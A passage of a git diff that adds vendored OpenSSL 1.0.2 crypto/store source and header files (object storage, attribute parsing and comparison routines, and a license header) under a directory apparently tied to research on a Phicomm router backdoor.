+    if (!s->meth->modify_object(s, STORE_OBJECT_TYPE_NUMBER,
+                                search_attributes, add_attributes,
+                                modify_attributes, delete_attributes,
+                                parameters)) {
+        STOREerr(STORE_F_STORE_MODIFY_NUMBER,
+                 STORE_R_FAILED_MODIFYING_NUMBER);
+        return 0;
+    }
+    return 1;
+}
+
+BIGNUM *STORE_get_number(STORE *s, OPENSSL_ITEM attributes[],
+                         OPENSSL_ITEM parameters[])
+{
+    STORE_OBJECT *object;
+    BIGNUM *n;
+
+    check_store(s, STORE_F_STORE_GET_NUMBER,
+                get_object, STORE_R_NO_GET_OBJECT_NUMBER_FUNCTION);
+
+    object = s->meth->get_object(s, STORE_OBJECT_TYPE_NUMBER, attributes,
+                                 parameters);
+    if (!object || !object->data.number) {
+        STOREerr(STORE_F_STORE_GET_NUMBER, STORE_R_FAILED_GETTING_NUMBER);
+        return 0;
+    }
+    n = object->data.number;
+    object->data.number = NULL;
+    STORE_OBJECT_free(object);
+    return n;
+}
+
+int STORE_delete_number(STORE *s, OPENSSL_ITEM attributes[],
+                        OPENSSL_ITEM parameters[])
+{
+    check_store(s, STORE_F_STORE_DELETE_NUMBER,
+                delete_object, STORE_R_NO_DELETE_NUMBER_FUNCTION);
+
+    if (!s->meth->delete_object(s, STORE_OBJECT_TYPE_NUMBER, attributes,
+                                parameters)) {
+        STOREerr(STORE_F_STORE_DELETE_NUMBER, STORE_R_FAILED_DELETING_NUMBER);
+        return 0;
+    }
+    return 1;
+}
+
+int STORE_store_arbitrary(STORE *s, BUF_MEM *data, OPENSSL_ITEM attributes[],
+                          OPENSSL_ITEM parameters[])
+{
+    STORE_OBJECT *object;
+    int i;
+
+    check_store(s, STORE_F_STORE_STORE_ARBITRARY,
+                store_object, STORE_R_NO_STORE_OBJECT_ARBITRARY_FUNCTION);
+
+    object = STORE_OBJECT_new();
+    if (!object) {
+        STOREerr(STORE_F_STORE_STORE_ARBITRARY, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    object->data.arbitrary = data;
+
+    i = s->meth->store_object(s, STORE_OBJECT_TYPE_ARBITRARY, object,
+                              attributes, parameters);
+
+    STORE_OBJECT_free(object);
+
+    if (!i) {
+        STOREerr(STORE_F_STORE_STORE_ARBITRARY,
+                 STORE_R_FAILED_STORING_ARBITRARY);
+        return 0;
+    }
+    return 1;
+}
+
+int STORE_modify_arbitrary(STORE *s, OPENSSL_ITEM search_attributes[],
+                           OPENSSL_ITEM add_attributes[],
+                           OPENSSL_ITEM modify_attributes[],
+                           OPENSSL_ITEM delete_attributes[],
+                           OPENSSL_ITEM parameters[])
+{
+    check_store(s, STORE_F_STORE_MODIFY_ARBITRARY,
+                modify_object, STORE_R_NO_MODIFY_OBJECT_FUNCTION);
+
+    if (!s->meth->modify_object(s, STORE_OBJECT_TYPE_ARBITRARY,
+                                search_attributes, add_attributes,
+                                modify_attributes, delete_attributes,
+                                parameters)) {
+        STOREerr(STORE_F_STORE_MODIFY_ARBITRARY,
+                 STORE_R_FAILED_MODIFYING_ARBITRARY);
+        return 0;
+    }
+    return 1;
+}
+
+BUF_MEM *STORE_get_arbitrary(STORE *s, OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[])
+{
+    STORE_OBJECT *object;
+    BUF_MEM *b;
+
+    check_store(s, STORE_F_STORE_GET_ARBITRARY,
+                get_object, STORE_R_NO_GET_OBJECT_ARBITRARY_FUNCTION);
+
+    object = s->meth->get_object(s, STORE_OBJECT_TYPE_ARBITRARY,
+                                 attributes, parameters);
+    if (!object || !object->data.arbitrary) {
+        STOREerr(STORE_F_STORE_GET_ARBITRARY,
+                 STORE_R_FAILED_GETTING_ARBITRARY);
+        return 0;
+    }
+    b = object->data.arbitrary;
+    object->data.arbitrary = NULL;
+    STORE_OBJECT_free(object);
+    return b;
+}
+
+int STORE_delete_arbitrary(STORE *s, OPENSSL_ITEM attributes[],
+                           OPENSSL_ITEM parameters[])
+{
+    check_store(s, STORE_F_STORE_DELETE_ARBITRARY,
+                delete_object, STORE_R_NO_DELETE_ARBITRARY_FUNCTION);
+
+    if (!s->meth->delete_object(s, STORE_OBJECT_TYPE_ARBITRARY, attributes,
+                                parameters)) {
+        STOREerr(STORE_F_STORE_DELETE_ARBITRARY,
+                 STORE_R_FAILED_DELETING_ARBITRARY);
+        return 0;
+    }
+    return 1;
+}
+
+STORE_OBJECT *STORE_OBJECT_new(void)
+{
+    STORE_OBJECT *object = OPENSSL_malloc(sizeof(STORE_OBJECT));
+    if (object)
+        memset(object, 0, sizeof(STORE_OBJECT));
+    return object;
+}
+
+void STORE_OBJECT_free(STORE_OBJECT *data)
+{
+    if (!data)
+        return;
+    switch (data->type) {
+    case STORE_OBJECT_TYPE_X509_CERTIFICATE:
+        X509_free(data->data.x509.certificate);
+        break;
+    case STORE_OBJECT_TYPE_X509_CRL:
+        X509_CRL_free(data->data.crl);
+        break;
+    case STORE_OBJECT_TYPE_PRIVATE_KEY:
+    case STORE_OBJECT_TYPE_PUBLIC_KEY:
+        EVP_PKEY_free(data->data.key);
+        break;
+    case STORE_OBJECT_TYPE_NUMBER:
+        BN_free(data->data.number);
+        break;
+    case STORE_OBJECT_TYPE_ARBITRARY:
+        BUF_MEM_free(data->data.arbitrary);
+        break;
+    }
+    OPENSSL_free(data);
+}
+
+IMPLEMENT_STACK_OF(STORE_OBJECT*)
+
+struct STORE_attr_info_st {
+    unsigned char set[(STORE_ATTR_TYPE_NUM + 8) / 8];
+    union {
+        char *cstring;
+        unsigned char *sha1string;
+        X509_NAME *dn;
+        BIGNUM *number;
+        void *any;
+    } values[STORE_ATTR_TYPE_NUM + 1];
+    size_t value_sizes[STORE_ATTR_TYPE_NUM + 1];
+};
+
+#define ATTR_IS_SET(a,i)        ((i) > 0 && (i) < STORE_ATTR_TYPE_NUM \
+                                && ((a)->set[(i) / 8] & (1 << ((i) % 8))))
+#define SET_ATTRBIT(a,i)        ((a)->set[(i) / 8] |= (1 << ((i) % 8)))
+#define CLEAR_ATTRBIT(a,i)      ((a)->set[(i) / 8] &= ~(1 << ((i) % 8)))
+
+STORE_ATTR_INFO *STORE_ATTR_INFO_new(void)
+{
+    return (STORE_ATTR_INFO *)OPENSSL_malloc(sizeof(STORE_ATTR_INFO));
+}
+
+static void STORE_ATTR_INFO_attr_free(STORE_ATTR_INFO *attrs,
+                                      STORE_ATTR_TYPES code)
+{
+    if (ATTR_IS_SET(attrs, code)) {
+        switch (code) {
+        case STORE_ATTR_FRIENDLYNAME:
+        case STORE_ATTR_EMAIL:
+        case STORE_ATTR_FILENAME:
+            STORE_ATTR_INFO_modify_cstr(attrs, code, NULL, 0);
+            break;
+        case STORE_ATTR_KEYID:
+        case STORE_ATTR_ISSUERKEYID:
+        case STORE_ATTR_SUBJECTKEYID:
+        case STORE_ATTR_ISSUERSERIALHASH:
+        case STORE_ATTR_CERTHASH:
+            STORE_ATTR_INFO_modify_sha1str(attrs, code, NULL, 0);
+            break;
+        case STORE_ATTR_ISSUER:
+        case STORE_ATTR_SUBJECT:
+            STORE_ATTR_INFO_modify_dn(attrs, code, NULL);
+            break;
+        case STORE_ATTR_SERIAL:
+            STORE_ATTR_INFO_modify_number(attrs, code, NULL);
+            break;
+        default:
+            break;
+        }
+    }
+}
+
+int STORE_ATTR_INFO_free(STORE_ATTR_INFO *attrs)
+{
+    if (attrs) {
+        STORE_ATTR_TYPES i;
+        for (i = 0; i++ < STORE_ATTR_TYPE_NUM;)
+            STORE_ATTR_INFO_attr_free(attrs, i);
+        OPENSSL_free(attrs);
+    }
+    return 1;
+}
+
+char *STORE_ATTR_INFO_get0_cstr(STORE_ATTR_INFO *attrs, STORE_ATTR_TYPES code)
+{
+    if (!attrs) {
+        STOREerr(STORE_F_STORE_ATTR_INFO_GET0_CSTR,
+                 ERR_R_PASSED_NULL_PARAMETER);
+        return NULL;
+    }
+    if (ATTR_IS_SET(attrs, code))
+        return attrs->values[code].cstring;
+    STOREerr(STORE_F_STORE_ATTR_INFO_GET0_CSTR, STORE_R_NO_VALUE);
+    return NULL;
+}
+
+unsigned char *STORE_ATTR_INFO_get0_sha1str(STORE_ATTR_INFO *attrs,
+                                            STORE_ATTR_TYPES code)
+{
+    if (!attrs) {
+        STOREerr(STORE_F_STORE_ATTR_INFO_GET0_SHA1STR,
+                 ERR_R_PASSED_NULL_PARAMETER);
+        return NULL;
+    }
+    if (ATTR_IS_SET(attrs, code))
+        return attrs->values[code].sha1string;
+    STOREerr(STORE_F_STORE_ATTR_INFO_GET0_SHA1STR, STORE_R_NO_VALUE);
+    return NULL;
+}
+
+X509_NAME *STORE_ATTR_INFO_get0_dn(STORE_ATTR_INFO *attrs,
+                                   STORE_ATTR_TYPES code)
+{
+    if (!attrs) {
+        STOREerr(STORE_F_STORE_ATTR_INFO_GET0_DN,
+                 ERR_R_PASSED_NULL_PARAMETER);
+        return NULL;
+    }
+    if (ATTR_IS_SET(attrs, code))
+        return attrs->values[code].dn;
+    STOREerr(STORE_F_STORE_ATTR_INFO_GET0_DN, STORE_R_NO_VALUE);
+    return NULL;
+}
+
+BIGNUM *STORE_ATTR_INFO_get0_number(STORE_ATTR_INFO *attrs,
+                                    STORE_ATTR_TYPES code)
+{
+    if (!attrs) {
+        STOREerr(STORE_F_STORE_ATTR_INFO_GET0_NUMBER,
+                 ERR_R_PASSED_NULL_PARAMETER);
+        return NULL;
+    }
+    if (ATTR_IS_SET(attrs, code))
+        return attrs->values[code].number;
+    STOREerr(STORE_F_STORE_ATTR_INFO_GET0_NUMBER, STORE_R_NO_VALUE);
+    return NULL;
+}
+
+int STORE_ATTR_INFO_set_cstr(STORE_ATTR_INFO *attrs, STORE_ATTR_TYPES code,
+                             char *cstr, size_t cstr_size)
+{
+    if (!attrs) {
+        STOREerr(STORE_F_STORE_ATTR_INFO_SET_CSTR,
+                 ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    if (!ATTR_IS_SET(attrs, code)) {
+        if ((attrs->values[code].cstring = BUF_strndup(cstr, cstr_size)))
+            return 1;
+        STOREerr(STORE_F_STORE_ATTR_INFO_SET_CSTR, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    STOREerr(STORE_F_STORE_ATTR_INFO_SET_CSTR, STORE_R_ALREADY_HAS_A_VALUE);
+    return 0;
+}
+
+int STORE_ATTR_INFO_set_sha1str(STORE_ATTR_INFO *attrs, STORE_ATTR_TYPES code,
+                                unsigned char *sha1str, size_t sha1str_size)
+{
+    if (!attrs) {
+        STOREerr(STORE_F_STORE_ATTR_INFO_SET_SHA1STR,
+                 ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    if (!ATTR_IS_SET(attrs, code)) {
+        if ((attrs->values[code].sha1string =
+             (unsigned char *)BUF_memdup(sha1str, sha1str_size)))
+            return 1;
+        STOREerr(STORE_F_STORE_ATTR_INFO_SET_SHA1STR, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    STOREerr(STORE_F_STORE_ATTR_INFO_SET_SHA1STR,
+             STORE_R_ALREADY_HAS_A_VALUE);
+    return 0;
+}
+
+int STORE_ATTR_INFO_set_dn(STORE_ATTR_INFO *attrs, STORE_ATTR_TYPES code,
+                           X509_NAME *dn)
+{
+    if (!attrs) {
+        STOREerr(STORE_F_STORE_ATTR_INFO_SET_DN, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    if (!ATTR_IS_SET(attrs, code)) {
+        if ((attrs->values[code].dn = X509_NAME_dup(dn)))
+            return 1;
+        STOREerr(STORE_F_STORE_ATTR_INFO_SET_DN, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    STOREerr(STORE_F_STORE_ATTR_INFO_SET_DN, STORE_R_ALREADY_HAS_A_VALUE);
+    return 0;
+}
+
+int STORE_ATTR_INFO_set_number(STORE_ATTR_INFO *attrs, STORE_ATTR_TYPES code,
+                               BIGNUM *number)
+{
+    if (!attrs) {
+        STOREerr(STORE_F_STORE_ATTR_INFO_SET_NUMBER,
+                 ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    if (!ATTR_IS_SET(attrs, code)) {
+        if ((attrs->values[code].number = BN_dup(number)))
+            return 1;
+        STOREerr(STORE_F_STORE_ATTR_INFO_SET_NUMBER, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    STOREerr(STORE_F_STORE_ATTR_INFO_SET_NUMBER, STORE_R_ALREADY_HAS_A_VALUE);
+    return 0;
+}
+
+int STORE_ATTR_INFO_modify_cstr(STORE_ATTR_INFO *attrs, STORE_ATTR_TYPES code,
+                                char *cstr, size_t cstr_size)
+{
+    if (!attrs) {
+        STOREerr(STORE_F_STORE_ATTR_INFO_MODIFY_CSTR,
+                 ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    if (ATTR_IS_SET(attrs, code)) {
+        OPENSSL_free(attrs->values[code].cstring);
+        attrs->values[code].cstring = NULL;
+        CLEAR_ATTRBIT(attrs, code);
+    }
+    return STORE_ATTR_INFO_set_cstr(attrs, code, cstr, cstr_size);
+}
+
+int STORE_ATTR_INFO_modify_sha1str(STORE_ATTR_INFO *attrs,
+                                   STORE_ATTR_TYPES code,
+                                   unsigned char *sha1str,
+                                   size_t sha1str_size)
+{
+    if (!attrs) {
+        STOREerr(STORE_F_STORE_ATTR_INFO_MODIFY_SHA1STR,
+                 ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    if (ATTR_IS_SET(attrs, code)) {
+        OPENSSL_free(attrs->values[code].sha1string);
+        attrs->values[code].sha1string = NULL;
+        CLEAR_ATTRBIT(attrs, code);
+    }
+    return STORE_ATTR_INFO_set_sha1str(attrs, code, sha1str, sha1str_size);
+}
+
+int STORE_ATTR_INFO_modify_dn(STORE_ATTR_INFO *attrs, STORE_ATTR_TYPES code,
+                              X509_NAME *dn)
+{
+    if (!attrs) {
+        STOREerr(STORE_F_STORE_ATTR_INFO_MODIFY_DN,
+                 ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    if (ATTR_IS_SET(attrs, code)) {
+        OPENSSL_free(attrs->values[code].dn);
+        attrs->values[code].dn = NULL;
+        CLEAR_ATTRBIT(attrs, code);
+    }
+    return STORE_ATTR_INFO_set_dn(attrs, code, dn);
+}
+
+int STORE_ATTR_INFO_modify_number(STORE_ATTR_INFO *attrs,
+                                  STORE_ATTR_TYPES code, BIGNUM *number)
+{
+    if (!attrs) {
+        STOREerr(STORE_F_STORE_ATTR_INFO_MODIFY_NUMBER,
+                 ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    if (ATTR_IS_SET(attrs, code)) {
+        OPENSSL_free(attrs->values[code].number);
+        attrs->values[code].number = NULL;
+        CLEAR_ATTRBIT(attrs, code);
+    }
+    return STORE_ATTR_INFO_set_number(attrs, code, number);
+}
+
+struct attr_list_ctx_st {
+    OPENSSL_ITEM *attributes;
+};
+void *STORE_parse_attrs_start(OPENSSL_ITEM *attributes)
+{
+    if (attributes) {
+        struct attr_list_ctx_st *context = (struct attr_list_ctx_st *)
+            OPENSSL_malloc(sizeof(struct attr_list_ctx_st));
+        if (context)
+            context->attributes = attributes;
+        else
+            STOREerr(STORE_F_STORE_PARSE_ATTRS_START, ERR_R_MALLOC_FAILURE);
+        return context;
+    }
+    STOREerr(STORE_F_STORE_PARSE_ATTRS_START, ERR_R_PASSED_NULL_PARAMETER);
+    return 0;
+}
+
+STORE_ATTR_INFO *STORE_parse_attrs_next(void *handle)
+{
+    struct attr_list_ctx_st *context = (struct attr_list_ctx_st *)handle;
+
+    if (context && context->attributes) {
+        STORE_ATTR_INFO *attrs = NULL;
+
+        while (context->attributes
+               && context->attributes->code != STORE_ATTR_OR
+               && context->attributes->code != STORE_ATTR_END) {
+            switch (context->attributes->code) {
+            case STORE_ATTR_FRIENDLYNAME:
+            case STORE_ATTR_EMAIL:
+            case STORE_ATTR_FILENAME:
+                if (!attrs)
+                    attrs = STORE_ATTR_INFO_new();
+                if (attrs == NULL) {
+                    STOREerr(STORE_F_STORE_PARSE_ATTRS_NEXT,
+                             ERR_R_MALLOC_FAILURE);
+                    goto err;
+                }
+                STORE_ATTR_INFO_set_cstr(attrs,
+                                         context->attributes->code,
+                                         context->attributes->value,
+                                         context->attributes->value_size);
+                break;
+            case STORE_ATTR_KEYID:
+            case STORE_ATTR_ISSUERKEYID:
+            case STORE_ATTR_SUBJECTKEYID:
+            case STORE_ATTR_ISSUERSERIALHASH:
+            case STORE_ATTR_CERTHASH:
+                if (!attrs)
+                    attrs = STORE_ATTR_INFO_new();
+                if (attrs == NULL) {
+                    STOREerr(STORE_F_STORE_PARSE_ATTRS_NEXT,
+                             ERR_R_MALLOC_FAILURE);
+                    goto err;
+                }
+                STORE_ATTR_INFO_set_sha1str(attrs,
+                                            context->attributes->code,
+                                            context->attributes->value,
+                                            context->attributes->value_size);
+                break;
+            case STORE_ATTR_ISSUER:
+            case STORE_ATTR_SUBJECT:
+                if (!attrs)
+                    attrs = STORE_ATTR_INFO_new();
+                if (attrs == NULL) {
+                    STOREerr(STORE_F_STORE_PARSE_ATTRS_NEXT,
+                             ERR_R_MALLOC_FAILURE);
+                    goto err;
+                }
+                STORE_ATTR_INFO_modify_dn(attrs,
+                                          context->attributes->code,
+                                          context->attributes->value);
+                break;
+            case STORE_ATTR_SERIAL:
+                if (!attrs)
+                    attrs = STORE_ATTR_INFO_new();
+                if (attrs == NULL) {
+                    STOREerr(STORE_F_STORE_PARSE_ATTRS_NEXT,
+                             ERR_R_MALLOC_FAILURE);
+                    goto err;
+                }
+                STORE_ATTR_INFO_modify_number(attrs,
+                                              context->attributes->code,
+                                              context->attributes->value);
+                break;
+            }
+            context->attributes++;
+        }
+        if (context->attributes->code == STORE_ATTR_OR)
+            context->attributes++;
+        return attrs;
+ err:
+        while (context->attributes
+               && context->attributes->code != STORE_ATTR_OR
+               && context->attributes->code != STORE_ATTR_END)
+            context->attributes++;
+        if (context->attributes->code == STORE_ATTR_OR)
+            context->attributes++;
+        return NULL;
+    }
+    STOREerr(STORE_F_STORE_PARSE_ATTRS_NEXT, ERR_R_PASSED_NULL_PARAMETER);
+    return NULL;
+}
+
+int STORE_parse_attrs_end(void *handle)
+{
+    struct attr_list_ctx_st *context = (struct attr_list_ctx_st *)handle;
+
+    if (context && context->attributes) {
+#if 0
+        OPENSSL_ITEM *attributes = context->attributes;
+#endif
+        OPENSSL_free(context);
+        return 1;
+    }
+    STOREerr(STORE_F_STORE_PARSE_ATTRS_END, ERR_R_PASSED_NULL_PARAMETER);
+    return 0;
+}
+
+int STORE_parse_attrs_endp(void *handle)
+{
+    struct attr_list_ctx_st *context = (struct attr_list_ctx_st *)handle;
+
+    if (context && context->attributes) {
+        return context->attributes->code == STORE_ATTR_END;
+    }
+    STOREerr(STORE_F_STORE_PARSE_ATTRS_ENDP, ERR_R_PASSED_NULL_PARAMETER);
+    return 0;
+}
+
+static int attr_info_compare_compute_range(const unsigned char *abits,
+                                           const unsigned char *bbits,
+                                           unsigned int *alowp,
+                                           unsigned int *ahighp,
+                                           unsigned int *blowp,
+                                           unsigned int *bhighp)
+{
+    unsigned int alow = (unsigned int)-1, ahigh = 0;
+    unsigned int blow = (unsigned int)-1, bhigh = 0;
+    int i, res = 0;
+
+    for (i = 0; i < (STORE_ATTR_TYPE_NUM + 8) / 8; i++, abits++, bbits++) {
+        if (res == 0) {
+            if (*abits < *bbits)
+                res = -1;
+            if (*abits > *bbits)
+                res = 1;
+        }
+        if (*abits) {
+            if (alow == (unsigned int)-1) {
+                alow = i * 8;
+                if (!(*abits & 0x01))
+                    alow++;
+                if (!(*abits & 0x02))
+                    alow++;
+                if (!(*abits & 0x04))
+                    alow++;
+                if (!(*abits & 0x08))
+                    alow++;
+                if (!(*abits & 0x10))
+                    alow++;
+                if (!(*abits & 0x20))
+                    alow++;
+                if (!(*abits & 0x40))
+                    alow++;
+            }
+            ahigh = i * 8 + 7;
+            if (!(*abits & 0x80))
+                ahigh++;
+            if (!(*abits & 0x40))
+                ahigh++;
+            if (!(*abits & 0x20))
+                ahigh++;
+            if (!(*abits & 0x10))
+                ahigh++;
+            if (!(*abits & 0x08))
+                ahigh++;
+            if (!(*abits & 0x04))
+                ahigh++;
+            if (!(*abits & 0x02))
+                ahigh++;
+        }
+        if (*bbits) {
+            if (blow == (unsigned int)-1) {
+                blow = i * 8;
+                if (!(*bbits & 0x01))
+                    blow++;
+                if (!(*bbits & 0x02))
+                    blow++;
+                if (!(*bbits & 0x04))
+                    blow++;
+                if (!(*bbits & 0x08))
+                    blow++;
+                if (!(*bbits & 0x10))
+                    blow++;
+                if (!(*bbits & 0x20))
+                    blow++;
+                if (!(*bbits & 0x40))
+                    blow++;
+            }
+            bhigh = i * 8 + 7;
+            if (!(*bbits & 0x80))
+                bhigh++;
+            if (!(*bbits & 0x40))
+                bhigh++;
+            if (!(*bbits & 0x20))
+                bhigh++;
+            if (!(*bbits & 0x10))
+                bhigh++;
+            if (!(*bbits & 0x08))
+                bhigh++;
+            if (!(*bbits & 0x04))
+                bhigh++;
+            if (!(*bbits & 0x02))
+                bhigh++;
+        }
+    }
+    if (ahigh + alow < bhigh + blow)
+        res = -1;
+    if (ahigh + alow > bhigh + blow)
+        res = 1;
+    if (alowp)
+        *alowp = alow;
+    if (ahighp)
+        *ahighp = ahigh;
+    if (blowp)
+        *blowp = blow;
+    if (bhighp)
+        *bhighp = bhigh;
+    return res;
+}
+
+int STORE_ATTR_INFO_compare(const STORE_ATTR_INFO *const *a,
+                            const STORE_ATTR_INFO *const *b)
+{
+    if (a == b)
+        return 0;
+    if (!a)
+        return -1;
+    if (!b)
+        return 1;
+    return attr_info_compare_compute_range((*a)->set, (*b)->set, 0, 0, 0, 0);
+}
+
+int STORE_ATTR_INFO_in_range(STORE_ATTR_INFO *a, STORE_ATTR_INFO *b)
+{
+    unsigned int alow, ahigh, blow, bhigh;
+
+    if (a == b)
+        return 1;
+    if (!a)
+        return 0;
+    if (!b)
+        return 0;
+    attr_info_compare_compute_range(a->set, b->set,
+                                    &alow, &ahigh, &blow, &bhigh);
+    if (alow >= blow && ahigh <= bhigh)
+        return 1;
+    return 0;
+}
+
+int STORE_ATTR_INFO_in(STORE_ATTR_INFO *a, STORE_ATTR_INFO *b)
+{
+    unsigned char *abits, *bbits;
+    int i;
+
+    if (a == b)
+        return 1;
+    if (!a)
+        return 0;
+    if (!b)
+        return 0;
+    abits = a->set;
+    bbits = b->set;
+    for (i = 0; i < (STORE_ATTR_TYPE_NUM + 8) / 8; i++, abits++, bbits++) {
+        if (*abits && (*bbits & *abits) != *abits)
+            return 0;
+    }
+    return 1;
+}
+
+int STORE_ATTR_INFO_in_ex(STORE_ATTR_INFO *a, STORE_ATTR_INFO *b)
+{
+    STORE_ATTR_TYPES i;
+
+    if (a == b)
+        return 1;
+    if (!STORE_ATTR_INFO_in(a, b))
+        return 0;
+    for (i = 1; i < STORE_ATTR_TYPE_NUM; i++)
+        if (ATTR_IS_SET(a, i)) {
+            switch (i) {
+            case STORE_ATTR_FRIENDLYNAME:
+            case STORE_ATTR_EMAIL:
+            case STORE_ATTR_FILENAME:
+                if (strcmp(a->values[i].cstring, b->values[i].cstring))
+                    return 0;
+                break;
+            case STORE_ATTR_KEYID:
+            case STORE_ATTR_ISSUERKEYID:
+            case STORE_ATTR_SUBJECTKEYID:
+            case STORE_ATTR_ISSUERSERIALHASH:
+            case STORE_ATTR_CERTHASH:
+                if (memcmp(a->values[i].sha1string,
+                           b->values[i].sha1string, a->value_sizes[i]))
+                    return 0;
+                break;
+            case STORE_ATTR_ISSUER:
+            case STORE_ATTR_SUBJECT:
+                if (X509_NAME_cmp(a->values[i].dn, b->values[i].dn))
+                    return 0;
+                break;
+            case STORE_ATTR_SERIAL:
+                if (BN_cmp(a->values[i].number, b->values[i].number))
+                    return 0;
+                break;
+            default:
+                break;
+            }
+        }
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/str_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/str_locl.h
new file mode 100644
index 0000000..ac55784
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/str_locl.h
@@ -0,0 +1,125 @@
+/* crypto/store/str_locl.h -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2003.
+ */
+/* ====================================================================
+ * Copyright (c) 2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_STORE_LOCL_H
+# define HEADER_STORE_LOCL_H
+
+# include <openssl/crypto.h>
+# include <openssl/store.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+struct store_method_st {
+    char *name;
+    /*
+     * All the functions return a positive integer or non-NULL for success
+     * and 0, a negative integer or NULL for failure
+     */
+    /* Initialise the STORE with private data */
+    STORE_INITIALISE_FUNC_PTR init;
+    /* Initialise the STORE with private data */
+    STORE_CLEANUP_FUNC_PTR clean;
+    /* Generate an object of a given type */
+    STORE_GENERATE_OBJECT_FUNC_PTR generate_object;
+    /*
+     * Get an object of a given type.  This function isn't really very useful
+     * since the listing functions (below) can be used for the same purpose
+     * and are much more general.
+     */
+    STORE_GET_OBJECT_FUNC_PTR get_object;
+    /* Store an object of a given type. */
+    STORE_STORE_OBJECT_FUNC_PTR store_object;
+    /* Modify the attributes bound to an object of a given type. */
+    STORE_MODIFY_OBJECT_FUNC_PTR modify_object;
+    /* Revoke an object of a given type. */
+    STORE_HANDLE_OBJECT_FUNC_PTR revoke_object;
+    /* Delete an object of a given type. */
+    STORE_HANDLE_OBJECT_FUNC_PTR delete_object;
+    /*
+     * List a bunch of objects of a given type and with the associated
+     * attributes.
+     */
+    STORE_START_OBJECT_FUNC_PTR list_object_start;
+    STORE_NEXT_OBJECT_FUNC_PTR list_object_next;
+    STORE_END_OBJECT_FUNC_PTR list_object_end;
+    STORE_END_OBJECT_FUNC_PTR list_object_endp;
+    /* Store-level function to make any necessary update operations. */
+    STORE_GENERIC_FUNC_PTR update_store;
+    /* Store-level function to get exclusive access to the store. */
+    STORE_GENERIC_FUNC_PTR lock_store;
+    /* Store-level function to release exclusive access to the store. */
+    STORE_GENERIC_FUNC_PTR unlock_store;
+    /* Generic control function */
+    STORE_CTRL_FUNC_PTR ctrl;
+};
+
+struct store_st {
+    const STORE_METHOD *meth;
+    /* functional reference if 'meth' is ENGINE-provided */
+    ENGINE *engine;
+    CRYPTO_EX_DATA ex_data;
+    int references;
+};
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/str_mem.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/str_mem.c
new file mode 100644
index 0000000..8edd0eb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/str_mem.c
@@ -0,0 +1,383 @@
+/* crypto/store/str_mem.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2003.
+ */
+/* ====================================================================
